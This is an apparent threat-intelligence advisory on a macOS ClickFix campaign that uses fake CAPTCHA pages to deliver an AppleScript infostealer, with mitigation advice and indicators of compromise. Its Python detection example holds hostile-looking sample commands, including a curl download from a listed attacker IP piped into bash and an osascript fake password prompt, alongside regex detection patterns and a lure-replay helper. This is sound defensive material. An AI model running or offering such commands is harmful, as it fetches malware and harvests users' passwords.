
macOS ClickFix Campaign: AppleScript Stealers & New Terminal Protections

Severity: Medium
Published: Tue Apr 21 2026 (04/21/2026, 02:05:08 UTC)
Source: AlienVault OTX General

Description

The macOS ClickFix campaign uses fake CAPTCHA pages to trick users into executing malicious commands. The macOS variant deploys an AppleScript-based infostealer that collects sensitive data such as keychain databases, credentials, session cookies from multiple browsers, browser extensions, and cryptocurrency wallets. It uses a persistent dialog box mimicking system prompts to coerce users into providing their system password. Stolen session cookies allow attackers to bypass multi-factor authentication by hijacking active sessions. The campaign filters victims by user-agent to deliver OS-specific payloads. Recent macOS updates include native terminal security warnings to alert users against pasting potentially malicious commands.

AI-Powered Analysis

Machine-generated threat intelligence

Last updated: 04/21/2026, 09:46:25 UTC

Technical Analysis

This campaign targets Windows and macOS users through fake CAPTCHA ("verify you are human") pages that instruct the visitor to copy a command and run it themselves; no exploit is involved, and the victim's own action starts the infection. On macOS the delivered payload is an AppleScript-based infostealer that collects keychain databases, credentials, session cookies from 12 browsers, data from more than 200 browser extensions, and 16 cryptocurrency wallets. To obtain the login password it needs to unlock the keychain, the script shows a dialog styled like a legitimate system prompt that cannot be closed and persists until the user supplies a password. The stolen session cookies let the attacker replay an already authenticated browser session, which bypasses multi-factor authentication because the second factor was satisfied when the victim logged in. The lure page uses client-side JavaScript to check the visitor's user agent, serving an OS-specific command to Windows and macOS desktop browsers and nothing to mobile devices. Apple has added native Terminal warnings in recent macOS versions that alert the user when a potentially malicious command is pasted, which is the built-in control most directly aimed at this lure.
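To make the victim-filtering step concrete, here is an added Python example (not code from the campaign, the OTX pulse, or the Netskope write-up) of a user-agent check in the same spirit as the client-side JavaScript described above. The classification rules are an assumption about how such a page behaves, not a reproduction of the actual script, and the user-agent strings are constructed. Two practical takeaways: a fetch with curl's default user agent, or from a phone, returns nothing interesting, so analysts replaying the lure should present a desktop Windows or macOS user agent; and iPadOS Safari in its default desktop mode sends a Macintosh user agent, so a check like this cannot tell an iPad from a Mac.

```python
import re
from typing import Optional

# Tokens that mark a phone/tablet browser. A ClickFix-style page ignores these
# visitors because the lure relies on a desktop terminal (assumption about the page).
MOBILE_MARKERS = re.compile(r"\b(?:Mobile|Android|iPhone|iPad|iPod|Windows Phone)\b", re.IGNORECASE)

# Desktop user agents an analyst can present when replaying the lure in a sandbox
# (constructed, generic strings; not taken from the campaign).
DESKTOP_UA = {
    "windows": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/124.0 Safari/537.36",
    "macos": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 "
             "(KHTML, like Gecko) Version/17.4 Safari/605.1.15",
}


def select_payload(user_agent: Optional[str]) -> Optional[str]:
    """Decide which OS-specific lure a filtering page would serve.

    Returns "windows" or "macos" for desktop browsers and None for mobile
    devices, command-line clients and anything unrecognised (no payload).
    """
    ua = user_agent or ""
    if not ua or MOBILE_MARKERS.search(ua):
        return None
    if "Windows NT" in ua:
        return "windows"
    # iPadOS in desktop mode also reports "Macintosh; Intel Mac OS X", so this
    # branch cannot distinguish an iPad from a Mac.
    if "Macintosh" in ua and "Mac OS X" in ua:
        return "macos"
    return None


def replay_headers(target_os: str) -> dict:
    """Request headers for fetching the lure page as a desktop victim would."""
    if target_os not in DESKTOP_UA:
        raise ValueError(f"unsupported target: {target_os}")
    return {"User-Agent": DESKTOP_UA[target_os], "Accept": "text/html"}


if __name__ == "__main__":
    samples = [
        DESKTOP_UA["windows"],
        DESKTOP_UA["macos"],
        "curl/8.4.0",
        "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 "
        "(KHTML, like Gecko) Version/17.4 Mobile/15E148 Safari/604.1",
    ]
    for ua in samples:
        print(f"{select_payload(ua)!s:8} <- {ua[:60]}")
```

Run it with a captured user agent to see which branch a given visitor lands in; when proxying the live lure for analysis, send `replay_headers("macos")` or `replay_headers("windows")` to receive the macOS or Windows instructions respectively.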

Potential Impact

The campaign enables attackers to harvest highly sensitive data including credentials, keychain contents, browser session cookies, and cryptocurrency wallet information. This can lead to unauthorized access to user accounts, bypassing multi-factor authentication through session hijacking, and theft of cryptocurrency assets. The persistent password dialog raises the stakes further: once the victim types the macOS login password, the attacker has the keychain in the clear and a credential that is frequently reused elsewhere. The social-engineering approach, with a plausible CAPTCHA page and a system-styled prompt, increases the likelihood of successful infection among targeted users. This is an active campaign observed in the wild, but it exploits no software vulnerability; there is no CVE to track, and success depends entirely on the victim pasting the command and then typing a password into the fake prompt.

Mitigation Recommendations

There is no patch to apply: the chain contains no software vulnerability, only a user who is talked into running a command and then typing a password. Defensive effort therefore goes to those two user actions and to what happens right after them. Keep macOS current, since recent versions add a native Terminal warning when a command is pasted; that warning is the built-in control aimed directly at this lure, and users should know it exists and that the correct response to it is to stop. Teach the two tells: a CAPTCHA or "verification" page never needs you to open Terminal, and macOS never asks for your login password in a dialog that appears seconds after you ran something you pasted, so a password prompt that cannot be dismissed is itself an indicator. Security awareness training that shows the actual lure page and the fake prompt is more effective than generic phishing guidance. In endpoint telemetry, hunt for Terminal or a shell launching curl or wget piped into a shell, base64 decoding piped into a shell, and osascript running a "display dialog ... with hidden answer" prompt; these are the shapes a paste-and-run lure needs regardless of the exact string used. Block and alert on the domains, IP address, and URLs listed under Indicators of Compromise at DNS, proxy, and EDR. Treat any confirmed paste as a full credential compromise: the stealer targets session cookies, so resetting the account password alone is not enough. Revoke active browser sessions and tokens for every signed-in service, rotate passwords (including the macOS login password, since it was entered into the fake prompt), and move funds out of any wallet that was present on the host.
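The monitoring recommendation above is easier to act on with a concrete hunt. The following Python script is an added example (not part of the OTX pulse or the Netskope write-up): it scans shell command lines, whether from shell history, an EDR process-command-line export, or a unified-log dump, for the command shapes a paste-and-run lure relies on and for the network IoCs listed on this page. The regexes are generic patterns chosen for illustration, and the sample history lines are constructed; the exact command the campaign instructed victims to paste is not reproduced here.

```python
import re
from typing import Dict, Iterable, List

# Network indicators copied from this report's IoC table.
IOC_DOMAINS = ("gen.detect.by.nscloudsandbox.tr", "bull-run.fun", "spot-wave.fun")
IOC_IPS = ("172.94.9.250",)

# Command shapes a paste-and-run lure depends on. These are generic patterns
# (an assumption), not the exact command the campaign used.
PATTERNS = {
    # download piped straight into a shell
    "pipe_to_shell": re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|z)?sh\b"),
    # base64 blob decoded and piped into a shell (-D is the older macOS flag)
    "base64_decode_exec": re.compile(r"base64\s+(?:--decode|-d|-D)\b[^|\n]*\|\s*(?:ba|z)?sh\b"),
    # AppleScript password prompt: 'display dialog ... with hidden answer'
    "osascript_hidden_answer": re.compile(r"osascript\b.*display dialog.*hidden answer", re.IGNORECASE),
}


def severity(reasons: List[str]) -> str:
    """High when an execution pattern and a known IoC appear on the same line."""
    has_pattern = any(r in PATTERNS for r in reasons)
    has_ioc = any(r.startswith("ioc_") for r in reasons)
    if has_pattern and has_ioc:
        return "high"
    return "medium" if has_pattern else "low"


def scan_command_lines(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious line, with the reasons that matched."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        reasons = [name for name, rx in PATTERNS.items() if rx.search(line)]
        reasons += [f"ioc_domain:{d}" for d in IOC_DOMAINS if d in line]
        reasons += [f"ioc_ip:{ip}" for ip in IOC_IPS if ip in line]
        if reasons:
            findings.append({"line": lineno, "severity": severity(reasons),
                             "reasons": reasons, "text": line.strip()})
    return findings


# Constructed sample of a shell history / EDR command-line export. Lines 3-5
# imitate the lure shape; the others are ordinary admin activity.
SAMPLE_HISTORY = [
    "brew update && brew upgrade",
    "curl -O https://example.com/tools/release.tar.gz",
    "curl -fsSL http://172.94.9.250/d/xxx10108 | bash",
    "echo 'ZWNobyBoaQ==' | base64 -d | bash",
    "osascript -e 'display dialog \"macOS needs to update settings\" default answer \"\" with hidden answer'",
    "git pull origin main",
]


if __name__ == "__main__":
    for f in scan_command_lines(SAMPLE_HISTORY):
        print(f"line {f['line']} [{f['severity']}] {', '.join(f['reasons'])}: {f['text']}")
```

Feed it real data with something like `scan_command_lines(open(os.path.expanduser("~/.zsh_history")))` on a suspect host, or point it at the process command-line column of an EDR export. The severity split matters in triage: a bare IoC hit (low) may be an analyst's own fetch, while a pipe-to-shell line that also carries one of this report's indicators (high) is the lure itself.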


Technical Details

Author: AlienVault
TLP: white
References: https://www.netskope.com/blog/macos-clickfix-campaign-applescript-stealers-new-terminal-protections
Adversary: not attributed
Pulse Id: 69e6db546f646b9818b7bf0d
Threat Score: not set

Indicators of Compromise

Domains

gen.detect.by.nscloudsandbox.tr
bull-run.fun
spot-wave.fun

IP address

172.94.9.250 (CC=DE, ASN=AS3223 Voxility LLP)

Hashes

e12285f507c847b986233991b86b22e3 (MD5)
77b1beb083e4e2074402742ef2d677835072acf0e7ddd9ee8206e5a2c76b1ca5 (SHA-256)
c07a15640065580e3bbff86eb567050e1a9e9847e2034ff00953ce7eeb2eec41 (SHA-256)

URLs

https://bull-run.fun/
https://spot-wave.fun/
http://172.94.9.250/d/xxx10108

Threat ID: 69e743d919fe3cd2cdbf5f8c

Added to database: 4/21/2026, 9:31:05 AM

Last enriched: 4/21/2026, 9:46:25 AM

Last updated: 4/21/2026, 12:58:37 PM
